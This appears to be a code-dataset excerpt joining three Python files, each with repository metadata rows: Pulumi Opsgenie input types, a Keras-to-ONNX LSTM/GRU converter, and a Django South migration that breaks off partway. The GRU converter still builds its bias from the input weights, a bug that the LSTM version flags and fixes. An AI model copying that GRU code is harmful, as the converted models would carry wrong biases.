        :param pulumi.Input[str] field: Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `extra-properties`, `recipients`, `teams` or `priority`.
        :param pulumi.Input[str] operation: It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty` and `equals-ignore-whitespace`.
        :param pulumi.Input[str] expected_value: User defined value that will be compared with alert field according to the operation.
        :param pulumi.Input[str] key: If field is set as extra-properties, key could be used for key-value pair.
        :param pulumi.Input[bool] not_: Indicates behaviour of the given operation. Default value is false.
        :param pulumi.Input[int] order: Order of the condition in conditions list.
        """
        pulumi.set(__self__, "field", field)
        pulumi.set(__self__, "operation", operation)
        if expected_value is not None:
            pulumi.set(__self__, "expected_value", expected_value)
        if key is not None:
            pulumi.set(__self__, "key", key)
        if not_ is not None:
            pulumi.set(__self__, "not_", not_)
        if order is not None:
            pulumi.set(__self__, "order", order)

    @property
    @pulumi.getter
    def field(self) -> pulumi.Input[str]:
        """
        Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `extra-properties`, `recipients`, `teams` or `priority`.
        """
        return pulumi.get(self, "field")

    @field.setter
    def field(self, value: pulumi.Input[str]):
        pulumi.set(self, "field", value)

    @property
    @pulumi.getter
    def operation(self) -> pulumi.Input[str]:
        """
        It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty` and `equals-ignore-whitespace`.
        """
        return pulumi.get(self, "operation")

    @operation.setter
    def operation(self, value: pulumi.Input[str]):
        pulumi.set(self, "operation", value)

    @property
    @pulumi.getter(name="expectedValue")
    def expected_value(self) -> Optional[pulumi.Input[str]]:
        """
        User defined value that will be compared with alert field according to the operation.
        """
        return pulumi.get(self, "expected_value")

    @expected_value.setter
    def expected_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expected_value", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        """
        If field is set as extra-properties, key could be used for key-value pair.
        """
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter(name="not")
    def not_(self) -> Optional[pulumi.Input[bool]]:
        """
        Indicates behaviour of the given operation. Default value is false.
        """
        return pulumi.get(self, "not_")

    @not_.setter
    def not_(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "not_", value)

    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """
        Order of the condition in conditions list.
        """
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)
@pulumi.input_type
class TeamRoutingRuleNotifyArgs:
    """Input arguments for the notify target of a Team Routing Rule."""

    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] type: Type of the notify target (accepted values are not documented in this block — consult the provider docs).
        :param pulumi.Input[str] id: The ID of the Opsgenie Team Routing Rule.
        :param pulumi.Input[str] name: Name of the team routing rule
        """
        pulumi.set(__self__, "type", type)
        if id is not None:
            pulumi.set(__self__, "id", id)
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        # Required notify-target type; see __init__ docstring.
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Opsgenie Team Routing Rule.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the team routing rule
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class TeamRoutingRuleTimeRestrictionArgs:
    """Input arguments for the time restriction attached to a Team Routing Rule.

    NOTE(review): accepted values for ``type`` are not visible in this block —
    confirm against the Opsgenie provider documentation.
    """

    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 restrictions: Optional[pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleTimeRestrictionRestrictionArgs']]]] = None):
        pulumi.set(__self__, "type", type)
        if restrictions is not None:
            pulumi.set(__self__, "restrictions", restrictions)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        # Kind of time restriction applied by this rule.
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def restrictions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleTimeRestrictionRestrictionArgs']]]]:
        # Individual day/hour/minute frames making up the restriction.
        return pulumi.get(self, "restrictions")

    @restrictions.setter
    def restrictions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleTimeRestrictionRestrictionArgs']]]]):
        pulumi.set(self, "restrictions", value)
@pulumi.input_type
class TeamRoutingRuleTimeRestrictionRestrictionArgs:
    """One day/hour/minute frame of a Team Routing Rule time restriction.

    All six boundary fields are required: a start day/hour/minute and an
    end day/hour/minute.
    """

    def __init__(__self__, *,
                 end_day: pulumi.Input[str],
                 end_hour: pulumi.Input[int],
                 end_min: pulumi.Input[int],
                 start_day: pulumi.Input[str],
                 start_hour: pulumi.Input[int],
                 start_min: pulumi.Input[int]):
        pulumi.set(__self__, "end_day", end_day)
        pulumi.set(__self__, "end_hour", end_hour)
        pulumi.set(__self__, "end_min", end_min)
        pulumi.set(__self__, "start_day", start_day)
        pulumi.set(__self__, "start_hour", start_hour)
        pulumi.set(__self__, "start_min", start_min)

    @property
    @pulumi.getter(name="endDay")
    def end_day(self) -> pulumi.Input[str]:
        # Day name at which the frame ends.
        return pulumi.get(self, "end_day")

    @end_day.setter
    def end_day(self, value: pulumi.Input[str]):
        pulumi.set(self, "end_day", value)

    @property
    @pulumi.getter(name="endHour")
    def end_hour(self) -> pulumi.Input[int]:
        # Hour at which the frame ends.
        return pulumi.get(self, "end_hour")

    @end_hour.setter
    def end_hour(self, value: pulumi.Input[int]):
        pulumi.set(self, "end_hour", value)

    @property
    @pulumi.getter(name="endMin")
    def end_min(self) -> pulumi.Input[int]:
        # Minute at which the frame ends.
        return pulumi.get(self, "end_min")

    @end_min.setter
    def end_min(self, value: pulumi.Input[int]):
        pulumi.set(self, "end_min", value)

    @property
    @pulumi.getter(name="startDay")
    def start_day(self) -> pulumi.Input[str]:
        # Day name at which the frame starts.
        return pulumi.get(self, "start_day")

    @start_day.setter
    def start_day(self, value: pulumi.Input[str]):
        pulumi.set(self, "start_day", value)

    @property
    @pulumi.getter(name="startHour")
    def start_hour(self) -> pulumi.Input[int]:
        # Hour at which the frame starts.
        return pulumi.get(self, "start_hour")

    @start_hour.setter
    def start_hour(self, value: pulumi.Input[int]):
        pulumi.set(self, "start_hour", value)

    @property
    @pulumi.getter(name="startMin")
    def start_min(self) -> pulumi.Input[int]:
        # Minute at which the frame starts.
        return pulumi.get(self, "start_min")

    @start_min.setter
    def start_min(self, value: pulumi.Input[int]):
        pulumi.set(self, "start_min", value)
@pulumi.input_type
class UserUserAddressArgs:
    """Input arguments for a user's postal address; all fields are required."""

    def __init__(__self__, *,
                 city: pulumi.Input[str],
                 country: pulumi.Input[str],
                 line: pulumi.Input[str],
                 state: pulumi.Input[str],
                 zipcode: pulumi.Input[str]):
        pulumi.set(__self__, "city", city)
        pulumi.set(__self__, "country", country)
        pulumi.set(__self__, "line", line)
        pulumi.set(__self__, "state", state)
        pulumi.set(__self__, "zipcode", zipcode)

    @property
    @pulumi.getter
    def city(self) -> pulumi.Input[str]:
        # City portion of the address.
        return pulumi.get(self, "city")

    @city.setter
    def city(self, value: pulumi.Input[str]):
        pulumi.set(self, "city", value)

    @property
    @pulumi.getter
    def country(self) -> pulumi.Input[str]:
        # Country portion of the address.
        return pulumi.get(self, "country")

    @country.setter
    def country(self, value: pulumi.Input[str]):
        pulumi.set(self, "country", value)

    @property
    @pulumi.getter
    def line(self) -> pulumi.Input[str]:
        # Street / address line.
        return pulumi.get(self, "line")

    @line.setter
    def line(self, value: pulumi.Input[str]):
        pulumi.set(self, "line", value)

    @property
    @pulumi.getter
    def state(self) -> pulumi.Input[str]:
        # State / region portion of the address.
        return pulumi.get(self, "state")

    @state.setter
    def state(self, value: pulumi.Input[str]):
        pulumi.set(self, "state", value)

    @property
    @pulumi.getter
    def zipcode(self) -> pulumi.Input[str]:
        # Postal / ZIP code portion of the address.
        return pulumi.get(self, "zipcode")

    @zipcode.setter
    def zipcode(self, value: pulumi.Input[str]):
        pulumi.set(self, "zipcode", value)
@pulumi.input_type
class GetEscalationRepeatArgs:
    """Arguments for the ``repeat`` block of the escalation data source.

    Unlike the resource input types above, fields here use plain Python
    types (not ``pulumi.Input``) because they mirror data-source results.
    """

    def __init__(__self__, *,
                 close_alert_after_all: Optional[bool] = None,
                 count: Optional[int] = None,
                 reset_recipient_states: Optional[bool] = None,
                 wait_interval: Optional[int] = None):
        if close_alert_after_all is not None:
            pulumi.set(__self__, "close_alert_after_all", close_alert_after_all)
        if count is not None:
            pulumi.set(__self__, "count", count)
        if reset_recipient_states is not None:
            pulumi.set(__self__, "reset_recipient_states", reset_recipient_states)
        if wait_interval is not None:
            pulumi.set(__self__, "wait_interval", wait_interval)

    @property
    @pulumi.getter(name="closeAlertAfterAll")
    def close_alert_after_all(self) -> Optional[bool]:
        return pulumi.get(self, "close_alert_after_all")

    @close_alert_after_all.setter
    def close_alert_after_all(self, value: Optional[bool]):
        pulumi.set(self, "close_alert_after_all", value)

    @property
    @pulumi.getter
    def count(self) -> Optional[int]:
        return pulumi.get(self, "count")

    @count.setter
    def count(self, value: Optional[int]):
        pulumi.set(self, "count", value)

    @property
    @pulumi.getter(name="resetRecipientStates")
    def reset_recipient_states(self) -> Optional[bool]:
        return pulumi.get(self, "reset_recipient_states")

    @reset_recipient_states.setter
    def reset_recipient_states(self, value: Optional[bool]):
        pulumi.set(self, "reset_recipient_states", value)

    @property
    @pulumi.getter(name="waitInterval")
    def wait_interval(self) -> Optional[int]:
        return pulumi.get(self, "wait_interval")

    @wait_interval.setter
    def wait_interval(self, value: Optional[int]):
        pulumi.set(self, "wait_interval", value)
@pulumi.input_type
class GetEscalationRuleArgs:
    """Arguments for one ``rule`` block of the escalation data source.

    All four fields are required; they use plain Python types because
    they mirror data-source results.
    """

    def __init__(__self__, *,
                 condition: str,
                 delay: int,
                 notify_type: str,
                 recipients: Sequence['GetEscalationRuleRecipientArgs']):
        pulumi.set(__self__, "condition", condition)
        pulumi.set(__self__, "delay", delay)
        pulumi.set(__self__, "notify_type", notify_type)
        pulumi.set(__self__, "recipients", recipients)

    @property
    @pulumi.getter
    def condition(self) -> str:
        return pulumi.get(self, "condition")

    @condition.setter
    def condition(self, value: str):
        pulumi.set(self, "condition", value)

    @property
    @pulumi.getter
    def delay(self) -> int:
        return pulumi.get(self, "delay")

    @delay.setter
    def delay(self, value: int):
        pulumi.set(self, "delay", value)

    @property
    @pulumi.getter(name="notifyType")
    def notify_type(self) -> str:
        return pulumi.get(self, "notify_type")

    @notify_type.setter
    def notify_type(self, value: str):
        pulumi.set(self, "notify_type", value)

    @property
    @pulumi.getter
    def recipients(self) -> Sequence['GetEscalationRuleRecipientArgs']:
        return pulumi.get(self, "recipients")

    @recipients.setter
    def recipients(self, value: Sequence['GetEscalationRuleRecipientArgs']):
        pulumi.set(self, "recipients", value)
@pulumi.input_type
class GetEscalationRuleRecipientArgs:
    """Arguments for one recipient of an escalation-rule block (data source)."""

    def __init__(__self__, *,
                 id: Optional[str] = None,
                 type: Optional[str] = None):
        """
        :param str id: The ID of the Opsgenie Escalation.
        :param str type: Type of the recipient (accepted values are not documented in this block).
        """
        if id is not None:
            pulumi.set(__self__, "id", id)
        if type is not None:
            pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        """
        The ID of the Opsgenie Escalation.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[str]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[str]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[str]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class GetTeamMemberArgs:
    """Arguments for one member entry of the team data source."""

    def __init__(__self__, *,
                 id: Optional[str] = None,
                 role: Optional[str] = None):
        """
        :param str id: The ID of the Opsgenie Team.
        :param str role: The member's role within the Team.
        """
        if id is not None:
            pulumi.set(__self__, "id", id)
        if role is not None:
            pulumi.set(__self__, "role", role)

    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        """
        The ID of the Opsgenie Team.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[str]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def role(self) -> Optional[str]:
        return pulumi.get(self, "role")

    @role.setter
    def role(self, value: Optional[str]):
        pulumi.set(self, "role", value)
| 38.695198
| 305
| 0.63875
| 19,195
| 166,815
| 5.410524
| 0.025007
| 0.119474
| 0.074546
| 0.047383
| 0.921015
| 0.89573
| 0.86147
| 0.816533
| 0.796062
| 0.765731
| 0
| 0.001278
| 0.235273
| 166,815
| 4,310
| 306
| 38.704176
| 0.812837
| 0.258184
| 0
| 0.786802
| 1
| 0
| 0.112434
| 0.060282
| 0
| 0
| 0
| 0
| 0
| 1
| 0.212473
| false
| 0
| 0.001813
| 0.026831
| 0.33285
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
bad500201b4a00a944f37f705e91e2f13dd0f0a6
| 10,921
|
py
|
Python
|
keras-onnx/onnx_keras/recurrent_layers.py
|
jwj04ok/ONNX_Convertor
|
067a17e16dfc8aa80e36f44c4523959daf7359f5
|
[
"MIT"
] | 33
|
2020-06-09T21:05:35.000Z
|
2022-02-24T01:48:45.000Z
|
keras-onnx/onnx_keras/recurrent_layers.py
|
jwj04ok/ONNX_Convertor
|
067a17e16dfc8aa80e36f44c4523959daf7359f5
|
[
"MIT"
] | 17
|
2020-07-14T19:44:09.000Z
|
2022-02-10T10:03:01.000Z
|
keras-onnx/onnx_keras/recurrent_layers.py
|
jwj04ok/ONNX_Convertor
|
067a17e16dfc8aa80e36f44c4523959daf7359f5
|
[
"MIT"
] | 16
|
2020-06-17T22:56:11.000Z
|
2021-12-21T05:44:32.000Z
|
"""Converters for recurrent layers in Keras
"""
import onnx as O
import numpy as np
from .base_layer import Layer
from .core_layers import Activation
from .exceptions import FeatureNotImplemented, OnnxNotSupport
from . import helper
# Map Keras activation function names onto the operator names accepted by
# the ONNX RNN `activations` attribute. `linear` maps to None: it is the
# identity, so no explicit ONNX activation is emitted for it.
activation_mapping = {
    'elu': "Elu",
    'softplus': 'Softplus',
    'softsign': 'Softsign',
    'relu': 'Relu',
    'tanh': 'Tanh',
    'sigmoid': 'Sigmoid',
    'hard_sigmoid': 'HardSigmoid',
    'linear': None
}
class LSTM(Layer):
    """LSTM layer converter. This LSTM is not bidirectional.

    A Keras LSTM layer is expanded into four ONNX nodes:

        Transpose => LSTM => Transpose => Reshape

    The leading Transpose (perm=[1, 0, 2]) converts Keras' batch-major
    input into the sequence-major layout the ONNX `LSTM` operator
    consumes; the trailing Transpose/Reshape restore the layer's
    declared output shape.
    """

    def __init__(self, node):
        Layer.__init__(self, node)

    def generate(self):
        """Build the ONNX nodes and value infos for this Keras LSTM layer.

        Returns:
            (node_list, value_list): the generated NodeProto objects and
            the ValueInfoProto entries for their intermediate outputs.

        Raises:
            OnnxNotSupport: if the cell's activation or recurrent
                activation has no entry in ``activation_mapping``.
        """
        node_list = []
        value_list = []
        # Translate the Keras activation names to ONNX operator names.
        keras_activation = self.layer.cell.activation.__name__
        if keras_activation not in activation_mapping:
            raise OnnxNotSupport("Activation in LSTM: " + keras_activation)
        keras_activation = activation_mapping[keras_activation]
        keras_recurrent_activation = self.layer.cell.recurrent_activation.__name__
        if keras_recurrent_activation not in activation_mapping:
            raise OnnxNotSupport("Activation in LSTM: " + keras_recurrent_activation)
        keras_recurrent_activation = activation_mapping[keras_recurrent_activation]
        # ONNX activation order is [f, g, h]: gate activation first, then
        # the cell and output activations.
        activations = [keras_recurrent_activation, keras_activation, keras_activation]
        # Give activation alpha and beta for the activations that take
        # parameters; others get a placeholder 0.0/0.0 pair.
        activation_alpha = []
        activation_beta = []
        for activation in activations:
            if activation == 'Elu':
                activation_alpha.append(1.0)
                activation_beta.append(0.0)
            elif activation == 'HardSigmoid':
                # Keras hard_sigmoid uses slope 0.2 and offset 0.5.
                activation_alpha.append(0.2)
                activation_beta.append(0.5)
            else:
                activation_alpha.append(0.0)
                activation_beta.append(0.0)
        # Direction (this converter never emits 'bidirectional').
        if self.layer.go_backwards:
            direction = 'reverse'
        else:
            direction = 'forward'
        # Construct the first Transpose: batch-major -> sequence-major.
        input_list = []
        dims = [1, 0, 2]
        preprocess_name = self.name + "_preprocess"
        preprocess_node = O.helper.make_node(
            'Transpose',
            inputs=self.inputs,
            outputs=[preprocess_name],
            name=preprocess_name,
            perm=dims
        )
        preprocess_size = [self.node.inputs[0].keras_shape[1],
                           self.node.inputs[0].keras_shape[0], self.node.inputs[0].keras_shape[2]]
        preprocess_info = O.helper.make_tensor_value_info(
            preprocess_name,
            helper.dtype,
            preprocess_size
        )
        node_list.append(preprocess_node)
        value_list.append(preprocess_info)
        input_list.append(preprocess_name)
        # Construct the input weight tensor W: transpose to ONNX's
        # [4*hidden, input] layout and add the num_directions axis.
        w = self.layer.cell.get_weights()[0]
        w = np.transpose(w, [1, 0])
        w = np.expand_dims(w, 0)
        if helper.duplicate_weights:
            w_name = self.name + "_weight"
        else:
            w_name = self.layer.weights[0].name
        tn, ti = helper.getConstantNodeByName(w_name, w)
        node_list += tn
        value_list += ti
        input_list.append(w_name)
        # Construct the recurrent weight tensor R the same way.
        rw = self.layer.cell.get_weights()[1]
        rw = np.transpose(rw, [1, 0])
        rw = np.expand_dims(rw, 0)
        if helper.duplicate_weights:
            rw_name = self.name + "_recurrent_weight"
        else:
            rw_name = self.layer.weights[1].name
        tn, ti = helper.getConstantNodeByName(rw_name, rw)
        node_list += tn
        value_list += ti
        input_list.append(rw_name)
        # Construct the bias tensor B if the cell uses one.
        if self.layer.cell.use_bias:
            b = self.layer.cell.get_weights()[2]
            # BUG FIX: the original code expanded `w` here instead of `b`,
            # so the exported bias was a copy of the input weights.
            b = np.expand_dims(b, 0)
            # NOTE(review): the ONNX spec defines B as [Wb; Rb] with width
            # 8*hidden_size, while Keras stores a single 4*units bias.
            # Downstream consumers of this converter appear to accept the
            # narrower tensor — confirm before widening with zeros.
            if helper.duplicate_weights:
                bnode_name = self.name + "_bias"
            else:
                bnode_name = self.layer.weights[2].name
            tn, ti = helper.getConstantNodeByName(bnode_name, b)
            node_list += tn
            value_list += ti
            input_list.append(bnode_name)
        # Generate the LSTM node itself.
        output_name = self.name + "_intermediate"
        node = O.helper.make_node(
            'LSTM',
            inputs = input_list,
            outputs = [output_name],
            name = self.name,
            activation_alpha = activation_alpha,
            activation_beta = activation_beta,
            activations = activations,
            direction = direction,
            hidden_size = self.layer.cell.units
        )
        # LSTM output is [seq, num_directions, batch, hidden].
        output_size = [self.node.outputs[0].keras_shape[1],
                       self.node.outputs[0].keras_shape[0], 1, self.node.outputs[0].keras_shape[2]]
        output_info = O.helper.make_tensor_value_info(
            output_name,
            helper.dtype,
            output_size
        )
        node_list.append(node)
        value_list.append(output_info)
        # Second Transpose: move batch back in front of sequence.
        dims = [1, 2, 0, 3]
        postprocess_name = self.name + "_postprocess"
        postprocess_node = O.helper.make_node(
            'Transpose',
            inputs=[output_name],
            outputs=[postprocess_name],
            name=postprocess_name,
            perm=dims
        )
        postprocess_size = [1, self.node.outputs[0].shape[0],
                            self.node.outputs[0].shape[1], self.node.outputs[0].shape[2]]
        postprocess_info = O.helper.make_tensor_value_info(
            postprocess_name,
            helper.dtype,
            postprocess_size
        )
        node_list.append(postprocess_node)
        value_list.append(postprocess_info)
        # Final Reshape collapses the result to the layer's output shape.
        shape_name = self.name + '_shape'
        output_shape = self.output_shape
        tn, ti = helper.constructConstantNode(
            shape_name,
            np.array(output_shape, dtype='int64'))
        node_list += tn
        value_list += ti
        node = O.helper.make_node(
            op_type='Reshape',
            inputs=[postprocess_name, shape_name],
            outputs=self.outputs,
            name=self.name + "_reshape"
        )
        node_list.append(node)
        return node_list, value_list
class GRU(Layer):
"""GRU layer converter. This GRU is not bidirectional.
A GRU layer will be converted into four layers:
Transpose => GRU => Transpose => Reshape
"""
    def __init__(self, node):
        # All bookkeeping (name, inputs/outputs, layer handle) is done by
        # the generic Layer base class.
        Layer.__init__(self, node)
def generate(self):
# Convert GRU
node_list = []
value_list = []
# Keras activation layer
keras_activation = self.layer.cell.activation.__name__
if keras_activation not in activation_mapping:
raise OnnxNotSupport("Activation in GRU: " + keras_activation)
keras_activation = activation_mapping[keras_activation]
keras_recurrent_activation = self.layer.cell.recurrent_activation.__name__
if keras_recurrent_activation not in activation_mapping:
raise OnnxNotSupport("Activation in GRU: " + keras_recurrent_activation)
keras_recurrent_activation = activation_mapping[keras_recurrent_activation]
activations = [keras_recurrent_activation, keras_activation, keras_activation]
# Give activation alpha and beta
activation_alpha = []
activation_beta = []
for activation in activations:
if activation == 'Elu':
activation_alpha.append(1.0)
activation_beta.append(0.0)
elif activation == 'HardSigmoid':
activation_alpha.append(0.2)
activation_beta.append(0.5)
else:
activation_alpha.append(0.0)
activation_beta.append(0.0)
# Direction
if self.layer.go_backwards:
direction = 'reverse'
else:
direction = 'forward'
# Construct First Transpose
input_list = []
dims = [1, 0, 2]
preprocess_name = self.name + "_preprocess"
preprocess_node = O.helper.make_node(
'Transpose',
inputs=self.inputs,
outputs=[preprocess_name],
name=preprocess_name,
perm=dims
)
preprocess_size = [self.node.inputs[0].keras_shape[1],
self.node.inputs[0].keras_shape[0], self.node.inputs[0].keras_shape[2]]
preprocess_info = O.helper.make_tensor_value_info(
preprocess_name,
helper.dtype,
preprocess_size
)
node_list.append(preprocess_node)
value_list.append(preprocess_info)
input_list.append(preprocess_name)
# Construct Weights
w = self.layer.cell.get_weights()[0]
w = np.transpose(w, [1, 0])
w = np.expand_dims(w, 0)
if helper.duplicate_weights:
w_name = self.name + "_weight"
else:
w_name = self.layer.weights[0].name
tn, ti = helper.getConstantNodeByName(w_name, w)
node_list += tn
value_list += ti
input_list.append(w_name)
# Construct recurrent weight
rw = self.layer.cell.get_weights()[1]
rw = np.transpose(rw, [1, 0])
rw = np.expand_dims(rw, 0)
if helper.duplicate_weights:
rw_name = self.name + "_recurrent_weight"
else:
rw_name = self.layer.weights[1].name
tn, ti = helper.getConstantNodeByName(rw_name, rw)
node_list += tn
value_list += ti
input_list.append(rw_name)
# Construct bias if needed
if self.layer.cell.use_bias:
b = self.layer.cell.get_weights()[2]
b = np.expand_dims(w, 0)
if helper.duplicate_weights:
bnode_name = self.name + "_bias"
else:
bnode_name = self.layer.weights[2].name
tn, ti = helper.getConstantNodeByName(bnode_name, b)
node_list += tn
value_list += ti
input_list.append(bnode_name)
# Generate Node
output_name = self.name + "_intermediate"
node = O.helper.make_node(
'GRU',
inputs = input_list,
outputs = [output_name],
name = self.name,
activation_alpha = activation_alpha,
activation_beta = activation_beta,
activations = activations,
direction = direction,
hidden_size = self.layer.cell.units
)
output_size = [self.node.outputs[0].keras_shape[1],
self.node.outputs[0].keras_shape[0], 1, self.node.outputs[0].keras_shape[2]]
output_info = O.helper.make_tensor_value_info(
output_name,
helper.dtype,
output_size
)
node_list.append(node)
value_list.append(output_info)
# Construct second Transpose layer
dims = [1, 2, 0, 3]
postprocess_name = self.name + "_postprocess"
postprocess_node = O.helper.make_node(
'Transpose',
inputs=[output_name],
outputs=[postprocess_name],
name=postprocess_name,
perm=dims
)
postprocess_size = [1, self.node.outputs[0].shape[0],
self.node.outputs[0].shape[1], self.node.outputs[0].shape[2]]
postprocess_info = O.helper.make_tensor_value_info(
postprocess_name,
helper.dtype,
postprocess_size
)
node_list.append(postprocess_node)
value_list.append(postprocess_info)
# Construct Reshape
shape_name = self.name + '_shape'
output_shape = self.output_shape
tn, ti = helper.constructConstantNode(
shape_name,
np.array(output_shape, dtype='int64'))
node_list += tn
value_list += ti
node = O.helper.make_node(
op_type='Reshape',
inputs=[postprocess_name, shape_name],
outputs=self.outputs,
name=self.name + "_reshape"
)
node_list.append(node)
return node_list, value_list
| 33.194529
| 84
| 0.662027
| 1,355
| 10,921
| 5.087823
| 0.087823
| 0.02785
| 0.031332
| 0.02785
| 0.935016
| 0.935016
| 0.935016
| 0.935016
| 0.922541
| 0.922541
| 0
| 0.012896
| 0.233129
| 10,921
| 328
| 85
| 33.295732
| 0.810269
| 0.073437
| 0
| 0.869863
| 0
| 0
| 0.045297
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013699
| false
| 0
| 0.020548
| 0
| 0.047945
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24207cb8de31722021ccad5557890aecc7770ed6
| 11,824
|
py
|
Python
|
datawinners/custom_reports/crs/migrations/0001_initial.py
|
ICT4H/dcs-web
|
fb0f53fad4401cfac1c1789ff28b9d5bda40c975
|
[
"Apache-2.0"
] | 1
|
2015-11-02T09:11:12.000Z
|
2015-11-02T09:11:12.000Z
|
datawinners/custom_reports/crs/migrations/0001_initial.py
|
ICT4H/dcs-web
|
fb0f53fad4401cfac1c1789ff28b9d5bda40c975
|
[
"Apache-2.0"
] | null | null | null |
datawinners/custom_reports/crs/migrations/0001_initial.py
|
ICT4H/dcs-web
|
fb0f53fad4401cfac1c1789ff28b9d5bda40c975
|
[
"Apache-2.0"
] | null | null | null |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Auto-generated South migration: creates the six CRS reporting
    tables (WayBillSent/Received, SFMDistribution, PhysicalInventorySheet,
    SiteActivities, Warehouse). `qN` columns are renamed to domain columns
    via `db_column`. Do not restructure: South replays this historically.
    """

    def forwards(self, orm):
        # Adding model 'WayBillSent'
        db.create_table('crs_waybillsent', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('q1', self.gf('django.db.models.fields.TextField')(db_column='pl_code')),
            ('q2', self.gf('django.db.models.fields.TextField')(db_column='waybill_code')),
            ('q3', self.gf('django.db.models.fields.DateField')(db_column='sent_date')),
            ('q4', self.gf('django.db.models.fields.TextField')(null=True, db_column='transaction_type')),
            ('q5', self.gf('django.db.models.fields.TextField')(null=True, db_column='site_code')),
            ('q6', self.gf('django.db.models.fields.TextField')(db_column='sender_name')),
            ('q7', self.gf('django.db.models.fields.TextField')(db_column='truck_id')),
            ('q8', self.gf('django.db.models.fields.TextField')(db_column='food_type')),
            ('q9', self.gf('django.db.models.fields.FloatField')(db_column='weight')),
        ))
        db.send_create_signal('crs', ['WayBillSent'])
        # Adding model 'WayBillReceived'
        db.create_table('crs_waybillreceived', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('q1', self.gf('django.db.models.fields.TextField')(db_column='pl_code')),
            ('q2', self.gf('django.db.models.fields.TextField')(db_column='waybill_code')),
            ('q3', self.gf('django.db.models.fields.TextField')(db_column='site_code')),
            ('q4', self.gf('django.db.models.fields.TextField')(db_column='receiver_name')),
            ('q5', self.gf('django.db.models.fields.DateField')(db_column='received_date')),
            ('q6', self.gf('django.db.models.fields.TextField')(db_column='truck_id')),
            ('q7', self.gf('django.db.models.fields.FloatField')(db_column='good_net_weight')),
            ('q8', self.gf('django.db.models.fields.FloatField')(db_column='damaged_net_weight')),
        ))
        db.send_create_signal('crs', ['WayBillReceived'])
        # Adding model 'SFMDistribution'
        db.create_table('crs_sfmdistribution', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('q1', self.gf('django.db.models.fields.TextField')(db_column='site_code')),
            ('q2', self.gf('django.db.models.fields.DateField')(db_column='distribution_date')),
            ('q3', self.gf('django.db.models.fields.TextField')(db_column='received_waybill_code')),
            ('q4', self.gf('django.db.models.fields.FloatField')(db_column='distributed_oil_quantity')),
            ('q5', self.gf('django.db.models.fields.FloatField')(db_column='distributed_csb_quantity')),
            ('q6', self.gf('django.db.models.fields.TextField')(db_column='returned_waybill_code')),
            ('q7', self.gf('django.db.models.fields.IntegerField')(db_column='returned_oil_quantity')),
            ('q8', self.gf('django.db.models.fields.IntegerField')(db_column='returned_csb_quantity')),
        ))
        db.send_create_signal('crs', ['SFMDistribution'])
        # Adding model 'PhysicalInventorySheet'
        db.create_table('crs_physicalinventorysheet', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
